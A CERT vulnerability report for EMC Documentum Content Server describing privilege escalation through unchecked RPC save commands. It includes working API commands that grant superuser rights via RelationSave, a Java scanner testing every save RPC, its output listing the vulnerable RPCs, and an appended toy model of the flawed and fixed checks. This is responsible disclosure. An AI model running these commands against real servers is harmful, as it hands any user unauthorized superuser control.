Vulnerability Report Confirmation - [VRF#HUFG9EBA]

Your vulnerability report has been successfully received. The Report Tracking ID assigned to this report is VRF#HUFG9EBA. Details of your report are listed below.

If you have any questions or require additional information, please call the CERT Hotline at +1 412-268-7090 or send email to cert@cert.org. Please reference this Report Tracking ID: VRF#HUFG9EBA.

------------------------------------------------------------------------

Vulnerability Report

Name: Andrey B. Panfilov
Organization: independent
Email Address: andrew@panfilov.tel
Telephone Number:

Vulnerability Description:

EMC Documentum Content Server: any user is able to elevate privileges using inappropriate RPC save-commands.

Content Server assumes that the client sends correct RPC commands when saving objects having different object types (like SysObjSave for dm_sysobject, UserSave for dm_user, etc.) and does not check input arguments for some RPC commands (SAVE_CONT_ATTRS, RelationSave, dmScopeConfigSave), so a user is able to modify any object in the system using an inappropriate RPC save-command.

Demonstration:

API> retrieve,c,dm_user where user_name=USER
...
1101ffd780001911
API> set,c,l,user_privileges
SET> 16
...
OK
-- Here client sends SaveUser RPC-command
-- and Content Server handles it properly - user does not have
-- privileges to modify dm_user objects
API> save,c,l
...
[DM_USER_E_NEED_SU_OR_SYS_PRIV]error: "The current user (op1tp1) needs to have superuser or sysadmin privilege."
API> revert,c,l,
...
OK
API> get,c,l,i_vstamp
...
20
--
-- Here we send RelationSave RPC-command against dm_user object
--
API> apply,c,1101ffd780001911,RelationSave,OBJECT_TYPE,S,dm_user,IS_NEW_OBJECT,B,F,i_vstamp,I,20,user_privileges,I,16
...
q0
API> next,c,q0
...
OK
API> get,c,q0,result
...
1
API> revert,c,l,
...
OK
--
-- Now attacker has superuser privileges
--
API> get,c,l,user_privileges
...
16

==========================================8<=============================================================
import java.util.LinkedHashSet;
import java.util.Set;

import com.documentum.fc.client.DfClient;
import com.documentum.fc.client.IDfSession;
import com.documentum.fc.client.IDfSysObject;
import com.documentum.fc.client.IDfUser;
import com.documentum.fc.client.impl.objectmanager.TypeMechanics;
import com.documentum.fc.common.DfException;
import com.documentum.fc.common.DfList;
import com.documentum.fc.common.DfLoginInfo;
import com.documentum.fc.common.IDfList;

/**
 * @author Andrey B. Panfilov
 */
public class Test {

    public static void main(String[] argv) throws Exception {
        String docbase = argv[0];
        String userName = argv[1];
        String password = argv[2];
        IDfSession session = null;
        try {
            session = new DfClient().newSession(docbase, new DfLoginInfo(
                    userName, password));
            // The check is only meaningful for an account without elevated privileges.
            IDfUser user = session.getUser(null);
            if (user.isSuperUser() || user.isSystemAdmin()) {
                System.out.println("User " + userName
                        + " has too wide privileges, choose different one");
                System.exit(0);
            }
            // Collect the distinct save RPC names known to the client library.
            Set<String> saveMethods = new LinkedHashSet<String>();
            for (Object o : TypeMechanics.getAllInstances()) {
                saveMethods.add(((TypeMechanics) o).getSaveMethod());
            }
            for (String method : saveMethods) {
                System.out.println(method + "\tis "
                        + (checkDmMethod(session, method) ? "" : "not ")
                        + "vulnerable for dm_method objects, " + "\tis "
                        + (checkDmUser(session, method) ? "" : "not ")
                        + "vulnerable for dm_user objects");
            }
        } finally {
            if (session != null) {
                session.disconnect();
            }
        }
    }

    // Sends the given save RPC against the current dm_user object inside a
    // transaction that is always aborted, and reports whether the write was accepted.
    public static Boolean checkDmUser(IDfSession session, String method)
        throws DfException {
        try {
            session.beginTrans();
            IDfUser object = session.getUser(null);
            object.revert();
            IDfList params = new DfList(new String[] {"OBJECT_TYPE",
                "IS_NEW_OBJECT", "i_vstamp", "user_privileges", });
            IDfList types = new DfList(new String[] {"S", "B", "I", "I", });
            IDfList values = new DfList(new String[] {"dm_user", "F",
                String.valueOf(object.getVStamp()), "16" });
            session.apply(object.getObjectId().getId(), method, params, types,
                    values);
            object.revert();
            if (16 == object.getInt("user_privileges")) {
                return true;
            } else {
                return false;
            }
        } catch (DfException ex) {
            return false;
        } finally {
            session.abortTrans();
        }
    }

    // Same check against a dm_method object, using a timestamp as the marker value.
    public static Boolean checkDmMethod(IDfSession session, String method)
        throws DfException {
        try {
            session.beginTrans();
            IDfSysObject object = (IDfSysObject) session
                    .getObjectByQualification("dm_method");
            object.revert();
            String methodVerb = String.valueOf(System.currentTimeMillis());
            IDfList params = new DfList(new String[] {"OBJECT_TYPE",
                "IS_NEW_OBJECT", "i_vstamp", "method_verb", });
            IDfList types = new DfList(new String[] {"S", "B", "I", "S", });
            IDfList values = new DfList(new String[] {object.getTypeName(),
                "F", String.valueOf(object.getVStamp()), methodVerb });
            session.apply(object.getObjectId().getId(), method, params, types,
                    values);
            object.revert();
            if (methodVerb.equals(object.getString("method_verb"))) {
                return true;
            } else {
                return false;
            }
        } catch (DfException ex) {
            return false;
        } finally {
            session.abortTrans();
        }
    }

}
==========================================>8=============================================================

==========================================8<=============================================================
~]$ java Test repo user password
SAVE is not vulnerable for dm_method objects, is not vulnerable for dm_user objects
ContainmentSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects
SAVE_CONT_ATTRS is vulnerable for dm_method objects, is vulnerable for dm_user objects
SysObjSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects
FolderSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects
CabinetSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects
AssemblySave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects
SET_STORAGE is not vulnerable for dm_method objects, is not vulnerable for dm_user objects
UserSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects
GroupSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects
RegTableSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects
RouterSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects
InboxItemSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects
SAVE_FORMAT is not vulnerable for dm_method objects, is not vulnerable for dm_user objects
MAKE_DUMP is not vulnerable for dm_method objects, is not vulnerable for dm_user objects
RelationSave is vulnerable for dm_method objects, is vulnerable for dm_user objects
MAKE_FTINDEX is not vulnerable for dm_method objects, is not vulnerable for dm_user objects
RelationTypeSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects
DocbaseIdMapSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects
ACLSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects
PolicySave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects
ReferenceSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects
WflowSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects
IPKGSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects
WITEMSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects
dmAuditTrailSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects
AliasSetSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects
LiteObjSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects
PARTITION_SCHEME_SAVE is not vulnerable for dm_method objects, is not vulnerable for dm_user objects
dmScopeConfigSave is vulnerable for dm_method objects, is vulnerable for dm_user objects
dmDisplayConfigSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects
CLIENT_RIGHTS_DOMAIN_SAVE is not vulnerable for dm_method objects, is not vulnerable for dm_user objects
==========================================>8=============================================================

Can we provide your name to the vendor? Yes
Do you want to be publicly acknowledged? Yes
Vendor Contact Status: will not contact
Vendor Name: EMC
Vendor Contact Name:
Vendor Contact Email:
Vendor Contact Telephone Number:
Vendor Tracking ID:
Additional Vendor Information:
Affected System Configurations: All versions of EMC Documentum Content Server
How was this vulnerability found?
Is the vulnerability being exploited? Yes
Is there a public exploit? No
Vulnerability Impact: Any user is able to gain superuser privileges (modify any objects, run any commands, etc.)
Comments:
Attached File:
Date: 2014-04-25T08:22:44
Report Tracking ID: VRF#HUFG9EBA
CERT Tracking IDs:

------------------------------------------------------------------------

©2014 Carnegie Mellon University
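
The missing check described in the report, shown as a toy dispatcher in its flawed and hardened shapes. This is an added example, not part of the report and not EMC code: the class and method names are hypothetical, and the RelationSave to dm_relation pairing is an assumption (the other two pairings come from the report's description).

```java
import java.util.Map;

// Toy model of save-RPC dispatch (added illustration, not Content Server code).
public class SaveDispatchModel {
    // Hypothetical stand-in for a stored object: its real type plus one attribute.
    static final class StoredObject {
        final String type;
        int userPrivileges;
        StoredObject(String type, int userPrivileges) { this.type = type; this.userPrivileges = userPrivileges; }
    }

    // Save command -> object type it is meant for. The first two pairs are from
    // the report; RelationSave -> dm_relation is an assumption.
    static final Map<String, String> EXPECTED_TYPE = Map.of(
            "UserSave", "dm_user",
            "SysObjSave", "dm_sysobject",
            "RelationSave", "dm_relation");

    // Flawed shape: the privilege rule is attached to the command name the client chose.
    static boolean saveFlawed(String rpc, StoredObject target, boolean privileged, int value) {
        if (rpc.equals("UserSave") && !privileged) {
            return false; // the DM_USER_E_NEED_SU_OR_SYS_PRIV path
        }
        target.userPrivileges = value; // other handlers never look at target.type
        return true;
    }

    // Hardened shape: bind the command to the stored type, then apply the rule
    // that belongs to that type. A real server would also have to accept subtypes.
    static boolean saveChecked(String rpc, StoredObject target, boolean privileged, int value) {
        if (!target.type.equals(EXPECTED_TYPE.get(rpc))) {
            return false; // command does not match the object being saved
        }
        if (target.type.equals("dm_user") && !privileged) {
            return false; // rule keyed on the object's type, not on the command
        }
        target.userPrivileges = value;
        return true;
    }

    public static void main(String[] args) {
        StoredObject a = new StoredObject("dm_user", 0); // constructed sample objects
        StoredObject b = new StoredObject("dm_user", 0);
        System.out.println("flawed,  UserSave:     " + saveFlawed("UserSave", a, false, 16));
        System.out.println("flawed,  RelationSave: " + saveFlawed("RelationSave", a, false, 16));
        System.out.println("checked, RelationSave: " + saveChecked("RelationSave", b, false, 16));
        System.out.println("privileges: flawed=" + a.userPrivileges + " checked=" + b.userPrivileges);
    }
}
```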